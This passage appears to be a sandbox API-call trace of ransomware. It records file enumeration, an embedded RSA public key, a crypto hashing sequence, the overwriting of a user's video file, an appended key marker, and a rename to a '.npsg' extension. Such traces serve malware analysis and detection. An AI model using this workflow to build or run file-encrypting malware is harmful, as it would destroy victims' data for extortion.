hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x680feeb0, ftCreationTime.dwHighDateTime=0x1d5bab1, ftLastAccessTime.dwLowDateTime=0x423067e0, ftLastAccessTime.dwHighDateTime=0x1d5bdb0, ftLastWriteTime.dwLowDateTime=0x423067e0, ftLastWriteTime.dwHighDateTime=0x1d5bdb0, nFileSizeHigh=0x0, nFileSizeLow=0x18b2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E2QJQbao421MhH73FO.flv", cAlternateFileName="E2QJQB~1.FLV")) returned 1 [0239.623] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\Y1FygDtm\\E2QJQbao421MhH73FO.flv") returned=".flv" [0239.623] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\Y1FygDtm\\E2QJQbao421MhH73FO.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\y1fygdtm\\e2qjqbao421mhh73fo.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.623] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=101162) returned 1 [0239.623] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.626] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x18b04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.626] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.628] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x18b2a, lpOverlapped=0x0) returned 1 [0239.629] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.629] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.629] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.629] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0239.630] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.630] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.631] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.631] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.631] GetLastError () returned 0x0 [0239.631] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.631] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0239.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.631] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.631] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.631] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18b30) returned 0x3b95d50 [0239.632] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0239.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0239.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0239.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0239.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86b40 [0239.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88df0 [0239.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86b88 [0239.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e08 [0239.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e38 [0239.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e98 [0239.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e50 [0239.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0239.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0239.633] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e38 | out: hHeap=0x620000) returned 1 [0239.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e50 | out: hHeap=0x620000) returned 1 [0239.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e98 | out: hHeap=0x620000) returned 1 [0239.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0239.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e98 [0239.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0239.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88e50 [0239.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0239.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88e38 [0239.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0239.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0239.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0239.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0239.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0239.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0239.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0239.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e50 | out: hHeap=0x620000) returned 1 [0239.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e38 | out: hHeap=0x620000) returned 1 [0239.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0239.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e98 | out: hHeap=0x620000) returned 1 [0239.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0239.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.634] GetCurrentThreadId () returned 0x5b4 [0239.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0239.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b88878 [0239.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0239.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0239.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0239.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0239.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.634] GetCurrentThreadId () returned 0x5b4 [0239.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0239.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0239.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0239.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0239.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e98 [0239.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0239.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0239.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0239.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0239.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e38 [0239.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0239.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0239.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0239.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0239.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88e50 [0239.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0239.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0239.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0239.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e20 [0239.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0239.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88eb0 [0239.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0239.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0239.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e80 [0239.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e68 [0239.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88ec8 [0239.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e68 | out: hHeap=0x620000) returned 1 [0239.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88e68 [0239.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e80 | out: hHeap=0x620000) returned 1 [0239.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0239.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0239.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0239.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e38 | out: hHeap=0x620000) returned 1 [0239.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88e38 [0239.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0239.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e98 | out: hHeap=0x620000) returned 1 [0239.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0239.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ec8 | out: hHeap=0x620000) returned 1 [0239.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0239.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0239.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0239.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0239.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e38 | out: hHeap=0x620000) returned 1 [0239.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0239.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0239.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0239.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0239.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0239.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0239.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0239.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0239.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0239.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e68 | out: hHeap=0x620000) returned 1 [0239.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0239.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88eb0 | out: hHeap=0x620000) returned 1 [0239.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0239.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e50 | out: hHeap=0x620000) returned 1 [0239.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e20 | out: hHeap=0x620000) returned 1 [0239.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0239.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0239.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e08 | out: hHeap=0x620000) returned 1 [0239.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b86b88 | out: hHeap=0x620000) returned 1 [0239.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0239.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0239.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0239.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0239.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0239.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0239.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.639] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x18b25, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x18b25, lpOverlapped=0x0) returned 1 [0239.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0239.640] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x18b2a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.640] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0239.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0239.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0239.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0239.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0239.641] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0239.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.641] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.641] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.641] CloseHandle (hObject=0x644) returned 1 [0239.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393a30 [0239.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3b89cd0 [0239.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393a30 | out: hHeap=0x620000) returned 1 [0239.643] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\Y1FygDtm\\E2QJQbao421MhH73FO.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\y1fygdtm\\e2qjqbao421mhh73fo.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\Y1FygDtm\\E2QJQbao421MhH73FO.flv.npsg" (normalized: 